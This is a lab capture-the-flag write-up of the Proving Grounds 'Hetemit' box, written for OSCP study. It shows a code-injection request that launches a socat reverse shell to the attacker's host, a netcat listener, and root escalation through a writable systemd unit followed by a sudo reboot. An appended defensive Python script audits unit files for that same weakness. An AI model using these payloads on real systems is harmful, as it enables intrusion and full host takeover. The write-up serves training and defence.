Proving grounds:Hetemit

Al1z4deh:~# echo "Welcome"
3 min read, Oct 30, 2022

Today we will take a look at Proving Grounds: Hetemit. My purpose in sharing this post is to prepare for the OSCP exam, and to show you the way if you get stuck. Please try to understand each step and take notes.

  • Network scan
PORT      STATE SERVICE     VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.49.250
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 b1:e2:9d:f1:f8:10:db:a5:aa:5a:22:94:e8:92:61:65 (RSA)
|_ 256 48:bc:9d:eb:bd:4d:ac:b3:0b:5d:67:da:56:54:2b:a0 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos))
|_http-title: CentOS \xE6\x8F\x90\xE4\xBE\x9B\xE7\x9A\x84 Apache HTTP \xE6\x9C\x8D\xE5\x8A\xA1\xE5\x99\xA8\xE6\xB5\x8B\xE8\xAF\x95\xE9\xA1\xB5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos)
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
18000/tcp open biimenu?
50000/tcp open http Werkzeug httpd 1.0.1 (Python 3.6.8)
  • Werkzeug (50000)
┌──(root㉿kali)-[~/ctf]
└─# curl -X POST http://192.168.250.117:50000/verify --data "code=2*2"
4
└─# curl -X POST http://192.168.250.117:50000/verify --data "code=os.system('socat TCP:192.168.49.250:80 EXEC:sh')"

We catch a shell as cmeeks:

└─# nc -nvlp 80
listening on [any] 80 …
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.117] 34912
python3 -c 'import pty;pty.spawn("/bin/bash");'
[cmeeks@hetemit restjson_hetemit]$ whoami
whoami
cmeeks
[cmeeks@hetemit restjson_hetemit]$
  • Privesc
[cmeeks@hetemit restjson_hetemit]$ find /etc -type f -writable 2> /dev/null
find /etc -type f -writable 2> /dev/null
/etc/systemd/system/pythonapp.service
[cmeeks@hetemit restjson_hetemit]$ sudo -l
sudo -l
User cmeeks may run the following commands on hetemit:
(root) NOPASSWD: /sbin/halt, /sbin/reboot, /sbin/poweroff
[cmeeks@hetemit restjson_hetemit]$ cat exploit.sh
cat exploit.sh
#!/bin/bash
socat TCP:192.168.49.250:18000 EXEC:sh
[cmeeks@hetemit restjson_hetemit]$ chmod +x exploit.sh
[cmeeks@hetemit restjson_hetemit]$ pwd
pwd
/home/cmeeks/restjson_hetemit
Before
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target

[Service]
Type=simple
WorkingDirectory=/home/cmeeks/restjson_hetemit
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=cmeeks
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
After
[cmeeks@hetemit restjson_hetemit]$ cat /etc/systemd/system/pythonapp.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
ExecStart=/home/cmeeks/restjson_hetemit/exploit.sh
TimeoutSec=30
RestartSec=15s
User=root
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
[Install]
WantedBy=multi-user.target
[cmeeks@hetemit restjson_hetemit]$ sudo reboot

Listen

└─# nc -nvlp 18000 
listening on [any] 18000 …
A few seconds later
└─# nc -nvlp 18000
listening on [any] 18000 ...
connect to [192.168.49.250] from (UNKNOWN) [192.168.250.117] 55606
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux hetemit 4.18.0-193.28.1.el8_2.x86_64 #1 SMP Thu Oct 22 00:20:22 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

And now we are root.
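The escalation works because /etc/systemd/system/pythonapp.service is writable by cmeeks, the unit can be edited to run as root with an ExecStart of cmeeks's choosing, and sudo reboot is allowed without a password to restart it. The audit below is an added example, not part of the writeup, that looks for exactly that combination across a directory of unit files: a service that runs as root while its unit file or its ExecStart target is owned by, or writable by, someone other than the trusted uid. The trusted_uid parameter (default 0) and the build_fixture() directory, modelled on the "After" unit above, are constructed for this example so it runs offline.

```python
"""Audit systemd unit files for a root service whose unit file or ExecStart
target can be modified by an unprivileged user. Added example, not from the post."""
import os
import stat
import tempfile
from pathlib import Path
from typing import Dict, List

# Permission bits that let group or world modify a path.
_GROUP_OR_WORLD_WRITE = stat.S_IWGRP | stat.S_IWOTH


def _tamperable(path: Path, trusted_uid: int) -> List[str]:
    """Reasons a path could be rewritten by someone other than trusted_uid."""
    st = path.stat()
    reasons = []
    if st.st_uid != trusted_uid:
        reasons.append(f"{path.name} owned by uid {st.st_uid}, not {trusted_uid}")
    if st.st_mode & _GROUP_OR_WORLD_WRITE:
        reasons.append(f"{path.name} is group/world writable ({stat.filemode(st.st_mode)})")
    return reasons


def _service_section(text: str) -> Dict[str, str]:
    """Minimal key=value parser for the [Service] section; last value wins."""
    values, section = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        elif section == "Service" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip()] = value.strip()
    return values


def audit_unit(unit_path: Path, trusted_uid: int = 0) -> List[str]:
    """Return findings for one unit; an empty list means nothing suspicious."""
    service = _service_section(unit_path.read_text())
    if service.get("User", "root") not in ("root", "0"):   # systemd defaults to root
        return []  # runs unprivileged, so editing it gains no privilege
    reasons = _tamperable(unit_path, trusted_uid)
    exec_start = service.get("ExecStart", "")
    # First token is the executable; systemd allows prefixes such as "-" or "@".
    cmd = exec_start.split()[0].lstrip("-@:+!") if exec_start else ""
    if cmd and not os.path.isabs(cmd):
        reasons.append(f"ExecStart={cmd!r} is not an absolute path")
    elif cmd and Path(cmd).exists():
        reasons += _tamperable(Path(cmd), trusted_uid)
    return reasons


def audit_directory(unit_dir, trusted_uid: int = 0) -> Dict[str, List[str]]:
    """Map unit file name -> findings, for every *.service with findings."""
    findings = {}
    for unit in sorted(Path(unit_dir).glob("*.service")):
        reasons = audit_unit(unit, trusted_uid)
        if reasons:
            findings[unit.name] = reasons
    return findings


def build_fixture() -> Path:
    """Constructed sample directory (not the real box): one unit shaped like the
    rewritten pythonapp.service, one locked-down unit for comparison."""
    root = Path(tempfile.mkdtemp(prefix="unit-audit-"))
    exploit = root / "exploit.sh"
    exploit.write_text("#!/bin/bash\nexit 0\n")
    exploit.chmod(0o777)          # world-writable ExecStart target
    app = root / "app.sh"
    app.write_text("#!/bin/bash\nexit 0\n")
    app.chmod(0o755)
    bad = root / "pythonapp.service"
    bad.write_text(
        "[Unit]\nDescription=Python App\n[Service]\nType=simple\n"
        f"ExecStart={exploit}\nUser=root\n[Install]\nWantedBy=multi-user.target\n"
    )
    bad.chmod(0o666)              # the kind of hit `find /etc -writable` reported
    good = root / "locked.service"
    good.write_text(f"[Service]\nExecStart={app}\nUser=root\n")
    good.chmod(0o644)
    return root


def demo() -> Dict[str, List[str]]:
    """Run the audit over the fixture, treating the current user as the trusted owner."""
    return audit_directory(build_fixture(), trusted_uid=os.getuid())


if __name__ == "__main__":
    for unit, reasons in demo().items():
        print(unit)
        for reason in reasons:
            print("  -", reason)
```

Run against a real host as audit_directory("/etc/systemd/system") with the default trusted_uid of 0; the fix for a flagged unit is root ownership and mode 0644 on both the unit file and whatever ExecStart points at, or dropping User= to the unprivileged account the service actually needs.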

"If you have any questions or comments, please do not hesitate to write. Have a good day."
